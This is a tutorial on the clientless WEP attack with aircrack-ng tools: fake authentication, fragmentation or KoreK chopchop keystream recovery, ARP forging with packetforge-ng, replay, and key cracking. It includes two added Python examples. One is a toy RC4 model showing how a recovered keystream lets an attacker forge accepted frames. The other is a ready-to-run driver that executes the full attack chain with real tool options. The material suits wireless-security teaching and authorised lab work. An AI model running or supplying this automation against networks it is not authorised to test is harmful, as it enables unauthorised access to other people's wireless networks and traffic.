WEP Attack (OPEN) - Clientless
This attack uses packetforge-ng to forge an encrypted ARP request that is then replayed against the AP. Every replay makes the AP emit a new encrypted frame with a fresh IV, and once enough IVs are collected the WEP key can be cracked. No client needs to be connected to the AP.
1. Fake authentication attack (MAC association)
As in the scenario with clients connected, perform a fake authentication attack so that the AP associates our MAC address (refer to the 1st step of the WEP attack guide linked below). Without this association the AP silently drops the frames we inject later.
WEP Attack (OPEN) - Clients connected
2. Fragmentation attack / Korek Chop Chop
Either method recovers a PRGA keystream, from which we can subsequently create the ARP injection packet that we later replay to the AP to gather enough IVs, which in turn lets us crack the WEP key.
(i) Fragmentation
The fragmentation attack does not recover the WEP key itself; it recovers the PRGA keystream (about 1500 bytes, obtained from a single captured data packet). That keystream can be fed to packetforge-ng to generate encrypted packets for injection attacks.
(ii) Korek Chop Chop
The KoreK chopchop attack can decrypt a WEP packet without knowing the key. It recovers the keystream for a given packet, i.e. for that packet's IV, which lets us decrypt any earlier or later packet of equal or shorter length that reuses the same IV. More usefully, it lets us encrypt our own new packets under that IV for injection, without ever learning the WEP key.
KoreK chopchop is also useful for:
decrypting interesting packets
forging SNMP packets
blind port scanning of the network
creating ARP requests to accelerate IV collection
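Why a recovered keystream is enough to forge frames without the key, as an added example (not code from the original page or from the aircrack-ng project): the toy below models WEP with an inline RC4, a constructed 40-bit key that the attacker never sees, and a constructed client ARP request. The "fragmentation / chopchop" step is modelled as the moment the packet's plaintext becomes known; from there the attacker XORs out the keystream (the content of a .xor file) and reuses it, under the same IV, to encrypt a broadcast ARP request with a valid ICV, which the AP then accepts.

```python
"""Added example, not code from the original page or the aircrack-ng project.

Toy model of why a recovered PRGA keystream is enough to forge WEP frames
without the key: this is what the fragmentation / chopchop .xor file gives
packetforge-ng. RC4, the 40-bit 'WEP key', the IV and the captured ARP
request are all constructed here for the demonstration.
"""
import struct
import zlib
from typing import Tuple

LLC_SNAP_ARP = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"  # 802.2 LLC/SNAP header for ARP


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling (KSA) followed by `length` PRGA bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: little-endian CRC32 of the plaintext."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Legitimate station/AP side: IV || RC4(IV||key) XOR (plaintext || ICV)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + wep_key, len(body)))


def wep_decrypt(wep_key: bytes, frame: bytes) -> bytes:
    """AP side: decrypt with the real key and enforce the ICV (raises if bad)."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4_keystream(iv + wep_key, len(ct)))
    plaintext, got_icv = body[:-4], body[-4:]
    if got_icv != icv(plaintext):
        raise ValueError("ICV mismatch, frame rejected")
    return plaintext


def recover_prga(frame: bytes, known_plaintext: bytes) -> Tuple[bytes, bytes]:
    """Attacker side: once a frame's plaintext is known (chopchop output, or a
    fragment whose content is guessable), keystream = ciphertext XOR
    (plaintext || ICV). Returns (iv, keystream): what a .xor file holds."""
    iv, ct = frame[:3], frame[3:]
    return iv, xor(ct, known_plaintext + icv(known_plaintext))


def forge_frame(iv: bytes, keystream: bytes, new_plaintext: bytes) -> bytes:
    """Attacker side (what packetforge-ng does): reuse the IV and keystream to
    encrypt a new packet of equal or shorter length with a valid ICV."""
    body = new_plaintext + icv(new_plaintext)
    if len(body) > len(keystream):
        raise ValueError("new packet longer than the recovered keystream")
    return iv + xor(body, keystream)


def arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """LLC/SNAP + ARP request (htype 1, ptype IPv4, hlen 6, plen 4, op 1)."""
    return (LLC_SNAP_ARP + struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)
            + sender_mac + sender_ip + b"\x00" * 6 + target_ip)


def demo() -> dict:
    wep_key = bytes.fromhex("0102030405")  # constructed key; the attacker never sees it
    iv = b"\x0a\x0b\x0c"
    # constructed: a client's ARP request captured from the air
    client_arp = arp_request(bytes.fromhex("001122334455"),
                             bytes([192, 168, 1, 10]), bytes([192, 168, 1, 1]))
    captured = wep_encrypt(wep_key, iv, client_arp)
    # fragmentation/chopchop modelled as "plaintext now known" -> keystream for this IV
    iv_seen, keystream = recover_prga(captured, client_arp)
    # our broadcast ARP, as packetforge-ng -0 -k 255.255.255.255 -l 255.255.255.255 builds it
    our_arp = arp_request(bytes.fromhex("00aabbccddee"), b"\xff" * 4, b"\xff" * 4)
    forged = forge_frame(iv_seen, keystream, our_arp)
    accepted = wep_decrypt(wep_key, forged)  # the AP decrypts with the real key
    return {
        "keystream_bytes": len(keystream),
        "same_iv": forged[:3] == captured[:3],
        "ap_accepts": accepted == our_arp,
        "keystream_is_rc4": keystream == rc4_keystream(iv + wep_key, len(keystream)),
    }


if __name__ == "__main__":
    print(demo())
```

The length check in forge_frame is the "equal or shorter length" limit from the text: the keystream recovered from one packet only covers that packet's size plus the 4-byte ICV, which is why fragmentation (about 1500 bytes) is the more comfortable source for forging full-size packets.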
To perform the KoreK chopchop attack use the command below. Once a packet is received, enter 'y' to confirm that it should be used.
Then inspect the contents of the decrypted packet to discover the network's IP scheme.
3. Packetforge-ng create Injection packets
Creates encrypted packets that are later used for injection. The PRGA keystream recovered in step 2 is what packetforge-ng uses to encrypt the packet, so the WEP key is never needed.
4. Inject packets into the network (aireplay-ng interactive mode)
Select 'y' to send the packet to the AP. The 'data' count in airodump-ng should now increase rapidly; from here on the attack continues exactly as in the scenario where a client is connected.
5. Cracking the WEP key
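Steps 1 to 5 above as one scripted run, an added example that is not part of the original page or of the aircrack-ng project: a small Python driver around the suite's tools, the way lab automation usually wraps them. The monitor interface wlan0mon, the lab ESSID/BSSID/MAC values and the assumption that airodump-ng is already writing wep-*.cap are all constructed; the tool options themselves (aireplay-ng -1 fake auth, -5 fragmentation, -4 chopchop, -2 -r interactive replay, packetforge-ng -0 ARP forging, aircrack-ng -b) are the real ones.

```python
"""Added example, not part of the original page: steps 1 to 5 of the
clientless WEP attack driven from Python around the aircrack-ng tools.

Assumptions (constructed, change for your lab): monitor interface wlan0mon,
airodump-ng already writing wep-*.cap, the ESSID/BSSID/MAC in main().
"""
import glob
import os
import subprocess
from typing import List, Optional

IFACE = "wlan0mon"


def fake_auth_cmd(essid: str, bssid: str, ourmac: str, iface: str = IFACE) -> List[str]:
    """Step 1: one-shot fake authentication ('-1 0') so the AP accepts frames from our MAC."""
    return ["aireplay-ng", "-1", "0", "-e", essid, "-a", bssid, "-h", ourmac, iface]


def fragmentation_cmd(bssid: str, ourmac: str, iface: str = IFACE) -> List[str]:
    """Step 2(i): fragmentation attack; writes the recovered PRGA to fragment-*.xor."""
    return ["aireplay-ng", "-5", "-b", bssid, "-h", ourmac, iface]


def chopchop_cmd(bssid: str, ourmac: str, iface: str = IFACE) -> List[str]:
    """Step 2(ii): KoreK chopchop; writes replay_dec-*.xor (keystream) and replay_dec-*.cap."""
    return ["aireplay-ng", "-4", "-b", bssid, "-h", ourmac, iface]


def read_decrypted_cmd(capfile: str) -> List[str]:
    """Inspect the chopchop-decrypted packet to learn the network's IP scheme."""
    return ["tcpdump", "-n", "-vvv", "-e", "-s0", "-r", capfile]


def forge_arp_cmd(bssid: str, ourmac: str, xorfile: str, outfile: str = "arp-request") -> List[str]:
    """Step 3: packetforge-ng '-0' builds an encrypted ARP request from the keystream ('-y').
    Broadcast source/destination IPs are valid on any subnet, so the IP scheme is optional."""
    return ["packetforge-ng", "-0", "-a", bssid, "-h", ourmac,
            "-k", "255.255.255.255", "-l", "255.255.255.255",
            "-y", xorfile, "-w", outfile]


def inject_cmd(outfile: str = "arp-request", iface: str = IFACE) -> List[str]:
    """Step 4: interactive replay of the forged frame; aireplay-ng asks for 'y' before sending."""
    return ["aireplay-ng", "-2", "-r", outfile, iface]


def crack_cmd(bssid: str, capfiles: List[str]) -> List[str]:
    """Step 5: crack the key from the collected IVs."""
    return ["aircrack-ng", "-b", bssid, *capfiles]


def newest_keystream_file() -> Optional[str]:
    """Pick the most recent .xor written by fragmentation or chopchop."""
    files = glob.glob("fragment-*.xor") + glob.glob("replay_dec-*.xor")
    return max(files, key=os.path.getmtime) if files else None


def plan(essid: str, bssid: str, ourmac: str, xorfile: str,
         capfiles: List[str], use_chopchop: bool = False) -> List[List[str]]:
    """The whole attack as an ordered argv list, to review before running anything."""
    keystream_step = chopchop_cmd(bssid, ourmac) if use_chopchop else fragmentation_cmd(bssid, ourmac)
    return [
        fake_auth_cmd(essid, bssid, ourmac),
        keystream_step,
        forge_arp_cmd(bssid, ourmac, xorfile),
        inject_cmd(),
        crack_cmd(bssid, capfiles),
    ]


def run(argv: List[str]) -> None:
    """Run one step, failing loudly if the tool exits non-zero."""
    print("+", " ".join(argv))
    subprocess.run(argv, check=True)


def main() -> None:
    essid, bssid, ourmac = "lab-wep", "00:11:22:33:44:55", "00:aa:bb:cc:dd:ee"  # constructed
    run(fake_auth_cmd(essid, bssid, ourmac))
    run(fragmentation_cmd(bssid, ourmac))
    xorfile = newest_keystream_file()
    if xorfile is None:
        raise SystemExit("no .xor keystream file found: fragmentation failed, try chopchop_cmd")
    run(forge_arp_cmd(bssid, ourmac, xorfile))
    run(inject_cmd())  # leave this running until airodump-ng shows enough #Data
    run(crack_cmd(bssid, sorted(glob.glob("wep-*.cap"))))


if __name__ == "__main__":
    main()
```

plan() exists so the argv of every step can be checked (for the right BSSID, MAC and interface) before anything is transmitted; main() runs the fragmentation variant and falls back to telling you to use chopchop when no .xor file appears, which is the usual failure mode on APs that do not answer fragmented frames.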